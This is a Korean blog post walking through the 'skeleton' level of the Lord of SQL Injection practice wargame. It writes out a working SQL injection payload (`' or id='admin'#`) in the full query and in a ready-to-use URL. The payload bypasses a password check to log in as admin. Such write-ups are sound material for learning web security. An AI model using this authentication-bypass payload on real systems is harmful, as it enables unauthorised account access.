LOS 풀이 - (10) skeleton :: 평범한 직장인의 메모장 :)

LOS 풀이 - (10) skeleton

ManPD* 2021. 7. 11. 22:28

2021. 7. 11. 22:28

1. 문제 지문

2. 요약

prob, 언더바(_), 점(.), 소괄호 필터링
입력한 값과 DB에서 반환된 값이 'admin'일 경우 클리어

3. 문제 풀이

쿼리가 살짝 거창해 보이는데 별거 없다.

guest의 패스워드는 거짓으로 입력하고, id에 'admin'을 추가하여 입력하면 클리어 된다.

select id from prob_skeleton where id='guest' and pw='' or id='admin'#' and 1=0

https://los.eagle-jump.org/skeleton_8d9cbfe1efbd44cfbbdc63fa605e5f1b.php?pw=' or id='admin'%23

('#'은 '%23'으로 변환시켜서 공격)

클리어

저작자표시 비영리 동일조건 (새창열림)

'Web > LOS' 카테고리의 다른 글

LOS 풀이 - (11) golem (풀이 중) (0)	2022.03.12
LOS 풀이 - (09) vampire (0)	2021.07.11
LOS 풀이 - (08) troll (0)	2021.07.11
LOS 풀이 - (07) orge (0)	2019.07.09
LOS 풀이 - (06) darkelf (0)	2019.07.09

+ Recent posts

Powered by Tistory, Designed by wallel

티스토리툴바